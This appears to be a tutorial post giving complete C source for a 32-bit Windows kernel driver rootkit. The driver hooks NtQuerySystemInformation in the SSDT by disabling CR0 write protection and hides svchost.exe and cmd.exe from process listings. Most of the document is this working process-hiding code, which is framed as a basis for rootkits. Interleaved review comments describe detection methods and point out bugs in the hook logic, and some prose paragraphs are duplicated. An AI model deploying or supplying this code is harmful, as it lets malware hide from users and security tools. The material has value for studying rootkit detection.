When you open Task Manager, you see the list of running processes. This list is queried by calling the NtQuerySystemInformation function. When this function is called with the SystemProcessInformation (5) information class, the function returns a data structure that contains the running process list. By modifying this data structure, we can hide running processes from Task Manager or any other program.
With the NtQuerySystemInformation hook, we can modify the data structure and hide running processes.
In this example, I will hook the NtQuerySystemInformation function with SSDT hooking. A kernel mode driver is used to hook the SSDT.
The hook will hide all running svchost.exe and cmd.exe processes.
To install the driver, open the install.bat batch file.
SSDT hooking is a powerful technique. It allows you to create powerful kernel mode rootkits that can hide and protect processes, files, etc.
With the NtQuerySystemInformation hook, we can modify the data structure and hide running processes.
In this example, I will hook the NtQuerySystemInformation function with SSDT hooking. A kernel mode driver is used to hook the SSDT.
The hook will hide all running svchost.exe and cmd.exe processes.
CODE C Language
#include <ntddk.h>

/*
 * Layout of the kernel's system service descriptor table (SSDT) as this
 * driver assumes it. ServiceTableBase is indexed by service number and
 * holds the address of each system-call handler; every caller of a service
 * goes through that entry, so overwriting it redirects all callers.
 *
 * NOTE(review): this is 32-bit x86 only. KeServiceDescriptorTable is not
 * exported on x64 kernels, the table entries are treated as ULONG below,
 * and Kernel Patch Protection (PatchGuard) bug-checks on SSDT modification
 * there. Defensively, an SSDT whose entries do not point into the kernel
 * image is the classic integrity check for this class of hook.
 */
typedef struct _KSERVICE_DESCRIPTOR_TABLE {
    PULONG ServiceTableBase;
    PULONG ServiceCounterTableBase;
    ULONG NumberOfServices;
    PUCHAR ParamTableBase;
} KSERVICE_DESCRIPTOR_TABLE, *PKSERVICE_DESCRIPTOR_TABLE;

/*
 * Partial, driver-local redefinition of the process entry returned for
 * information class 5. Entries form a singly linked list in one buffer:
 * NextEntryOffset is the byte distance to the next entry, 0 on the last.
 * The hook below reads only NextEntryOffset and ImageName; the remaining
 * fields are declared solely to keep those two at the expected offsets
 * (presumably the documented SYSTEM_PROCESS_INFORMATION prefix -- confirm).
 */
typedef struct _SYSTEM_PROCESS_INFO {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    LARGE_INTEGER Reserved[3];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    ULONG BasePriority;
    HANDLE ProcessId;
    HANDLE InheritedFromProcessId;
} SYSTEM_PROCESS_INFO, *PSYSTEM_PROCESS_INFO;

/* Signature of the original NtQuerySystemInformation handler. */
typedef NTSTATUS (*pNtQuerySystemInformation)(ULONG, PVOID, ULONG, PULONG);

/* Resolved by the loader against ntoskrnl's export (32-bit kernels only). */
extern PKSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;

NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(ULONG, PVOID, ULONG, PULONG);

/* Address of the original handler, saved by DriverEntry and used both to
 * forward calls and to restore the SSDT entry on unload. */
pNtQuerySystemInformation fnNtQuerySystemInformation;

/*
 * Replace SSDT entry ServiceNumber with Hook and return the previous value.
 *
 * The parameter named Hook shadows this function's own name; inside the
 * body, Hook is the PVOID argument.
 *
 * The SSDT lives in read-only kernel memory, so the write is bracketed by
 * clearing CR0.WP (bit 16, 0x10000) and setting it again. cli/sti only mask
 * interrupts on the current processor; nothing here serialises against
 * other processors or against threads already executing a service call.
 * A cleared WP bit and a CR0 write from a third-party driver are themselves
 * strong telemetry signals for kernel-mode tampering.
 *
 * Returns the entry's previous contents, which the caller owns as the
 * "original" function pointer.
 */
PVOID Hook(ULONG ServiceNumber, PVOID Hook)
{
    PVOID OrigAddress;
    OrigAddress = (PVOID)KeServiceDescriptorTable->ServiceTableBase[ServiceNumber];
    __asm {
        cli
        mov eax, cr0
        and eax, not 0x10000   /* clear CR0.WP so the table page is writable */
        mov cr0, eax
    }
    KeServiceDescriptorTable->ServiceTableBase[ServiceNumber] = (ULONG)Hook;
    __asm {
        mov eax, cr0
        or eax, 0x10000        /* restore write protection */
        mov cr0, eax
        sti
    }
    return OrigAddress;
}

/*
 * Replacement handler installed in the SSDT slot of NtQuerySystemInformation.
 *
 * Every information class other than 5 (SystemProcessInformation) is
 * forwarded untouched. For class 5 the original handler fills Buffer first;
 * on success the entry list is then edited in place so that entries whose
 * ImageName equals "svchost.exe" or "cmd.exe" are unlinked by adding their
 * NextEntryOffset to the previous entry's (or terminating the list when the
 * unlinked entry was last). The entry at Buffer itself is used only as the
 * list head and is never compared. The caller's copy of the data is all that
 * changes; the kernel's own process bookkeeping is untouched, which is why
 * cross-view comparison (enumerating processes through a second, independent
 * source) exposes this kind of hook.
 *
 * NOTE(review): ImageName.Buffer is passed straight to wcscmp without a
 * NULL check, and after a svchost.exe unlink pNext is reset to pCurr, so the
 * cmd.exe comparison that follows runs against the previous entry again.
 *
 * Returns whatever the original handler returned.
 */
NTSTATUS HookNtQuerySystemInformation(ULONG InfoClass, PVOID Buffer, ULONG Length, PULONG ReturnLength)
{
    PSYSTEM_PROCESS_INFO pCurr, pNext;
    NTSTATUS ret;
    if (InfoClass != 5) {
        /* Not the process list: pass through unchanged. */
        return fnNtQuerySystemInformation(InfoClass, Buffer, Length, ReturnLength);
    }
    ret = fnNtQuerySystemInformation(InfoClass, Buffer, Length, ReturnLength);
    if (NT_SUCCESS(ret)) {
        pCurr = NULL;
        pNext = Buffer;
        /* Walk the list; pCurr is the entry that links to pNext. */
        while (pNext->NextEntryOffset != 0) {
            pCurr = pNext;
            pNext = (PSYSTEM_PROCESS_INFO)((PUCHAR)pCurr + pCurr->NextEntryOffset);
            if (!wcscmp(L"svchost.exe", pNext->ImageName.Buffer)) {
                if (pNext->NextEntryOffset == 0) {
                    pCurr->NextEntryOffset = 0;           /* removed entry was last */
                } else {
                    pCurr->NextEntryOffset += pNext->NextEntryOffset;  /* skip over it */
                }
                pNext = pCurr;   /* re-examine from the predecessor */
            }
            if (!wcscmp(L"cmd.exe", pNext->ImageName.Buffer)) {
                if (pNext->NextEntryOffset == 0) {
                    pCurr->NextEntryOffset = 0;
                } else {
                    pCurr->NextEntryOffset += pNext->NextEntryOffset;
                }
                pNext = pCurr;
            }
        }
    }
    return ret;
}

/*
 * DriverUnload routine: puts the saved original handler back into the SSDT.
 *
 * The service number is taken from the byte after the first opcode of the
 * ZwQuerySystemInformation stub (on 32-bit builds the stub starts with
 * mov eax, <service number>). There is no wait for calls that may still be
 * inside HookNtQuerySystemInformation when the driver image is unmapped.
 */
void Unload(PDRIVER_OBJECT pDriverObject)
{
    DbgPrint("Unload routine called.\n");
    Hook(*(PULONG)((PUCHAR)ZwQuerySystemInformation + 1), fnNtQuerySystemInformation);
}

/*
 * Driver entry point: registers Unload, installs the hook, and keeps the
 * returned original address in fnNtQuerySystemInformation.
 *
 * pRegistryPath is unused. Loading this driver at all requires kernel-mode
 * code execution (a signed or test-signed driver), which is the boundary
 * Driver Signature Enforcement and HVCI are meant to guard; the DbgPrint
 * of the original handler address is visible to any kernel debugger or
 * debug-output consumer attached to the machine.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    pDriverObject->DriverUnload = Unload;
    fnNtQuerySystemInformation = Hook(*(PULONG)((PUCHAR)ZwQuerySystemInformation + 1), HookNtQuerySystemInformation);
    DbgPrint("NtQuerySystemInformation address: %#x\n", fnNtQuerySystemInformation);
    return STATUS_SUCCESS;
}
To install the driver, open the install.bat batch file.
SSDT hooking is a powerful technique. It allows you to create powerful kernel mode rootkits that can hide and protect processes, files, etc.